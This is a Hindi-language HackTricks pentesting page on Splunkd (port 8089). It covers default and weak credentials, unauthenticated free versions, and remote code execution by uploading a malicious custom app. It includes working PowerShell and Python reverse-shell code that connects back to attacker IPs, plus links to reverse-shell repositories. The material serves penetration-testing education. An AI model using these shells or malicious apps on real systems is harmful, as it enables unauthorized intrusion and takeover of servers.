hacktricks/src/network-services-pentesting/8089-splunkd.md

# 8089 - Pentesting Splunkd

{{#include ../banners/hacktricks-training.md}}

## **बुनियादी जानकारी**

- लॉग एनालिटिक्स टूल जिसका उपयोग डेटा संग्रह, विश्लेषण और दृश्यता के लिए किया जाता है
- सुरक्षा निगरानी और व्यावसायिक विश्लेषण में सामान्यतः उपयोग किया जाता है
- डिफ़ॉल्ट पोर्ट:
- वेब सर्वर: 8000
- Splunkd सेवा: 8089

### कमजोरियों के वेक्टर:

1. मुफ्त संस्करण शोषण

- परीक्षण संस्करण 60 दिनों के बाद स्वचालित रूप से मुफ्त संस्करण में परिवर्तित हो जाता है
- मुफ्त संस्करण में प्रमाणीकरण की कमी होती है
- प्रबंधित न किए जाने पर संभावित सुरक्षा जोखिम
- प्रशासक सुरक्षा निहितार्थों को नजरअंदाज कर सकते हैं

2. क्रेडेंशियल कमजोरियाँ

- पुराने संस्करण: डिफ़ॉल्ट क्रेडेंशियल `admin:changeme`
- नए संस्करण: स्थापना के दौरान सेट किए गए क्रेडेंशियल
- कमजोर पासवर्ड के उपयोग की संभावना (जैसे, `admin`, `Welcome`, `Password123`)

3. रिमोट कोड निष्पादन के अवसर

- कोड निष्पादन के कई तरीके:
- सर्वर-साइड Django अनुप्रयोग
- REST एंडपॉइंट
- स्क्रिप्टेड इनपुट
- अलर्टिंग स्क्रिप्ट
- क्रॉस-प्लेटफ़ॉर्म समर्थन (Windows/Linux)
- स्क्रिप्टेड इनपुट चला सकते हैं:
- बैश स्क्रिप्ट
- पावरशेल स्क्रिप्ट
- बैच स्क्रिप्ट

मुख्य शोषण क्षमता:

- संवेदनशील डेटा भंडारण
- मुफ्त संस्करण में प्रमाणीकरण की कमी
- संभावित रिमोट कोड निष्पादन के लिए कई वेक्टर
- सिस्टम समझौते के लिए स्क्रिप्टेड इनपुट का लाभ उठाने की संभावना

### Shodan

- `Splunk build`

## RCE

### कस्टम एप्लिकेशन बनाएं

Splunk कस्टम एप्लिकेशन तैनाती के माध्यम से रिमोट कोड निष्पादन के लिए एक उन्नत विधि प्रदान करता है, जो इसके क्रॉस-प्लेटफ़ॉर्म स्क्रिप्टिंग क्षमताओं का लाभ उठाता है। मुख्य शोषण तकनीक एक दुर्भावनापूर्ण एप्लिकेशन बनाने के चारों ओर घूमती है जो Windows और Linux दोनों सिस्टम पर रिवर्स शेल निष्पादित कर सकती है।

एक कस्टम एप्लिकेशन **Python, Batch, Bash, या PowerShell स्क्रिप्ट** चला सकता है। इसके अलावा, **Splunk के साथ Python स्थापित है**, इसलिए **Windows** सिस्टम में भी आप पायथन कोड चला सकेंगे।

आप [**इस**](https://github.com/0xjpuff/reverse_shell_splunk) उदाहरण का उपयोग कर सकते हैं जिसमें **`bin`** में [Python](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/rev.py) और [PowerShell](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/run.ps1) के लिए उदाहरण शामिल हैं। या आप अपना खुद का बना सकते हैं।

शोषण प्रक्रिया प्लेटफार्मों के बीच एक सुसंगत पद्धति का पालन करती है:
```
splunk_shell/
├── bin        (reverse shell scripts)
└── default    (inputs.conf configuration)
```
महत्वपूर्ण कॉन्फ़िगरेशन फ़ाइल `inputs.conf` स्क्रिप्ट को सक्षम करती है:

- `disabled = 0` सेट करना
- 10-सेकंड के निष्पादन अंतराल को कॉन्फ़िगर करना
- स्क्रिप्ट के स्रोत प्रकार को परिभाषित करना

तैनाती सीधी है:

1. दुर्भावनापूर्ण एप्लिकेशन पैकेज बनाएं
2. हमलावर मशीन पर एक श्रोता (Netcat/socat) सेट करें
3. Splunk के इंटरफ़ेस के माध्यम से एप्लिकेशन अपलोड करें
4. अपलोड के बाद स्वचालित स्क्रिप्ट निष्पादन को ट्रिगर करें

नमूना Windows PowerShell रिवर्स शेल:
```bash
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
```
नमूना Linux Python रिवर्स शेल:
```python
import sys, socket, os, pty
ip = "10.10.14.15"
port = "443"
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')
```
### RCE & Privilege Escalation

इस पृष्ठ पर आप यह समझ सकते हैं कि इस सेवा का दुरुपयोग कैसे किया जा सकता है ताकि विशेषाधिकार बढ़ाए जा सकें और स्थिरता प्राप्त की जा सके:

{{#ref}}
../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md
{{#endref}}

## References

- [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213)

{{#include ../banners/hacktricks-training.md}}